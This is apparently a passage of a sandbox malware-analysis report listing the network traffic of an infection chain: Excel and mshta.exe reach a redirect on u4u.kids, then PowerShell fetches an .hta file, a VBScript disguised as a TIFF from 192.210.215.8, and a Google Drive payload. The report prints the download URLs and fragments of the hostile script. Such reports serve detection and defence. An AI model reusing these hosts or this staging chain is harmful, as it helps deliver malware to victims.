                                                                                              Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                              Oct 24, 2024 08:39:33.317418098 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                              Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                              Oct 24, 2024 08:39:33.317444086 CEST212INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                              Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                                                              Oct 24, 2024 08:39:33.317456961 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                              Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                              Oct 24, 2024 08:39:33.317473888 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                              Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                              Oct 24, 2024 08:39:33.317496061 CEST1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                              Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520XLnARKJsinCsIFrTKSHXPQnYrJBMwrVNmKOHsoBbzlVzzqFRAwbFwivSINilWjxcIBXcqMbaitZOgRKEhMuBzBOqBvrrKxTVGaxNIrrQEyvnzxNJbEwNSjCStvJ
                                                                                              Oct 24, 2024 08:39:33.317527056 CEST636INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                              Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                              Oct 24, 2024 08:39:33.317545891 CEST1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                                                              Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                                                              Oct 24, 2024 08:39:33.317563057 CEST1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                                                              Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                              Oct 24, 2024 08:39:33.322931051 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                              Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.2249165192.210.215.8803772C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 08:39:42.828366995 CEST363OUTGET /540/createdbestthingswithniceworkgreath.tIF HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: 192.210.215.8
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 08:39:43.515580893 CEST1236INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 06:39:43 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                              Last-Modified: Wed, 23 Oct 2024 03:47:53 GMT
                                                                                              ETag: "22522-6251cc0237337"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 140578
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: image/tiff
                                                                                              Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 70 00 69 00 6e 00 67 00 61 00 64 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 62 00 6f 00 6d 00 62 00 61 00 72 00 64 00 65 00 69 00 6f 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 62 00 6f 00 6d 00 62 00 61 00 72 00 64 00 65 00 69 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 [TRUNCATED]
                                                                                              Data Ascii: private function CreateSession(wsman, conStr, optDic, pingado) dim bombardeioFlags dim conOpt dim bombardeio dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword bombardeioFlags = 0 proxyAccess
                                                                                              Oct 24, 2024 08:39:43.515607119 CEST224INData Raw: 00 54 00 79 00 70 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20
                                                                                              Data Ascii: Type = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal
                                                                                              Oct 24, 2024 08:39:43.515651941 CEST1236INData Raw: 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 3d 00 20 00 22 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 50 00 61 00 73
                                                                                              Data Ascii: = 0 proxyUsername = "" proxyPassword = "" set conOpt = Nothing if optDic.ArgumentExists(NPARA
                                                                                              Oct 24, 2024 08:39:43.515727043 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 20 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 21 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52
                                                                                              Data Ascii: ' Invalid! ASSERTBOOL false, "The specified encoding flag is invalid." end if end
                                                                                              Oct 24, 2024 08:39:43.515738964 CEST424INData Raw: 00 45 00 53 00 53 00 4c 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6f 00 6e 00 6c 00 79 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 77 00 68 00 65 00 6e 00 20 00 75 00 73 00 65 00 64 00 20
                                                                                              Data Ascii: ESSL & "' option is only valid when used with the '-remote' option" bombardeioFlags = bombardeioFlags OR wsman.S
                                                                                              Oct 24, 2024 08:39:43.515813112 CEST1236INData Raw: 00 53 00 45 00 52 00 54 00 4e 00 41 00 4c 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 20 00 3d 00 20 00 6f 00 70
                                                                                              Data Ascii: SERTNAL(NPARA_AUTH) authVal = optDic.Argument(NPARA_AUTH) select case LCase(authVal) case
                                                                                              Oct 24, 2024 08:39:43.515825987 CEST1236INData Raw: 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 6e 00 6f 00 6e 00 65 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20
                                                                                              Data Ascii: alid for '-auth:none'" case VAL_BASIC 'Use -username and -password. ASSE
                                                                                              Oct 24, 2024 08:39:43.515836954 CEST424INData Raw: 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55
                                                                                              Data Ascii: xists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:digest'" ASSER
                                                                                              Oct 24, 2024 08:39:43.515908003 CEST1236INData Raw: 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 64 00 69 00 67 00 65 00 73 00 74 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 62 00 6f 00 6d
                                                                                              Data Ascii: for '-auth:digest'" bombardeioFlags = bombardeioFlags OR wsman.SessionFlagCredUsernamePassword OR wsman
                                                                                              Oct 24, 2024 08:39:43.515945911 CEST212INData Raw: 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20
                                                                                              Data Ascii: NPARA_CERT & "' option is not valid for '-auth:negotiate'" bombardeioFlags = bombardeioF
                                                                                              Oct 24, 2024 08:39:43.520983934 CEST1236INData Raw: 00 6c 00 61 00 67 00 73 00 20 00 4f 00 52 00 20 00 77 00 73 00 6d 00 61 00 6e 00 2e 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 46 00 6c 00 61 00 67 00 55 00 73 00 65 00 4e 00 65 00 67 00 6f 00 74 00 69 00 61 00 74 00 65 00 0d 00 0a 00 20 00 20
                                                                                              Data Ascii: lags OR wsman.SessionFlagUseNegotiate case VAL_CERT '-certificate is mandatory.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.2249170192.210.215.8801884C:\Windows\System32\mshta.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 08:39:54.044867992 CEST495OUTGET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Language: fr-FR
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              If-Modified-Since: Wed, 23 Oct 2024 03:51:20 GMT
                                                                                              Connection: Keep-Alive
                                                                                              Host: 192.210.215.8
                                                                                              If-None-Match: "20b6a-6251ccc7de906"
                                                                                              Oct 24, 2024 08:39:54.716686964 CEST275INHTTP/1.1 304 Not Modified
                                                                                              Date: Thu, 24 Oct 2024 06:39:54 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                              Last-Modified: Wed, 23 Oct 2024 03:51:20 GMT
                                                                                              ETag: "20b6a-6251ccc7de906"
                                                                                              Accept-Ranges: bytes
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.2249175192.210.215.880204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 08:40:18.572737932 CEST77OUTGET /540/ERFFDR.txt HTTP/1.1
                                                                                              Host: 192.210.215.8
                                                                                              Connection: Keep-Alive


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.2249176192.210.215.8803900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 08:40:27.319303989 CEST77OUTGET /540/ERFFDR.txt HTTP/1.1
                                                                                              Host: 192.210.215.8
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 08:40:27.990432978 CEST540INHTTP/1.1 404 Not Found
                                                                                              Date: Thu, 24 Oct 2024 06:40:27 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                              Content-Length: 299
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 32 31 30 2e 32 31 35 2e 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 192.210.215.8 Port 80</address></body></html>


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.224916124.199.88.844433404C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 06:39:29 UTC462OUTGET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: u4u.kids
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:39:29 UTC485INHTTP/1.1 302 Found
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 24 Oct 2024 06:39:29 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 106
                                                                                              Connection: close
                                                                                              X-DNS-Prefetch-Control: off
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Location: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
                                                                                              Vary: Accept
                                                                                              2024-10-24 06:39:29 UTC106INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 32 31 30 2e 32 31 35 2e 38 2f 35 34 30 2f 77 76 2f 75 77 61 6e 74 73 6b 69 6c 6c 74 68 69 6e 67 73 74 6f 62 65 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 65 76 65 72 79 6f 6e 65 77 69 74 68 75 74 68 61 74 2e 68 74 61
                                                                                              Data Ascii: Found. Redirecting to http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.224916324.199.88.844433688C:\Windows\System32\mshta.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 06:39:32 UTC486OUTGET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Language: fr-FR
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: u4u.kids
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:39:32 UTC485INHTTP/1.1 302 Found
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 24 Oct 2024 06:39:32 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 106
                                                                                              Connection: close
                                                                                              X-DNS-Prefetch-Control: off
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Location: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
                                                                                              Vary: Accept
                                                                                              2024-10-24 06:39:32 UTC106INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 32 31 30 2e 32 31 35 2e 38 2f 35 34 30 2f 77 76 2f 75 77 61 6e 74 73 6b 69 6c 6c 74 68 69 6e 67 73 74 6f 62 65 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 65 76 65 72 79 6f 6e 65 77 69 74 68 75 74 68 61 74 2e 68 74 61
                                                                                              Data Ascii: Found. Redirecting to http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.224916624.199.88.844433404C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 06:39:50 UTC462OUTGET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: u4u.kids
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:39:51 UTC485INHTTP/1.1 302 Found
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 24 Oct 2024 06:39:51 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 106
                                                                                              Connection: close
                                                                                              X-DNS-Prefetch-Control: off
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Location: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
                                                                                              Vary: Accept
                                                                                              2024-10-24 06:39:51 UTC106INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 32 31 30 2e 32 31 35 2e 38 2f 35 34 30 2f 77 76 2f 75 77 61 6e 74 73 6b 69 6c 6c 74 68 69 6e 67 73 74 6f 62 65 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 65 76 65 72 79 6f 6e 65 77 69 74 68 75 74 68 61 74 2e 68 74 61
                                                                                              Data Ascii: Found. Redirecting to http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.224916924.199.88.844431884C:\Windows\System32\mshta.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 06:39:53 UTC486OUTGET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Language: fr-FR
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: u4u.kids
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:39:54 UTC485INHTTP/1.1 302 Found
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 24 Oct 2024 06:39:53 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 106
                                                                                              Connection: close
                                                                                              X-DNS-Prefetch-Control: off
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Location: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
                                                                                              Vary: Accept
                                                                                              2024-10-24 06:39:54 UTC106INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 32 31 30 2e 32 31 35 2e 38 2f 35 34 30 2f 77 76 2f 75 77 61 6e 74 73 6b 69 6c 6c 74 68 69 6e 67 73 74 6f 62 65 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 65 76 65 72 79 6f 6e 65 77 69 74 68 75 74 68 61 74 2e 68 74 61
                                                                                              Data Ascii: Found. Redirecting to http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.2249171216.58.212.174443204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 06:39:56 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                              Host: drive.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:39:57 UTC1319INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 24 Oct 2024 06:39:56 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Xfz4EpkDFKpN46O-dpM8PA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
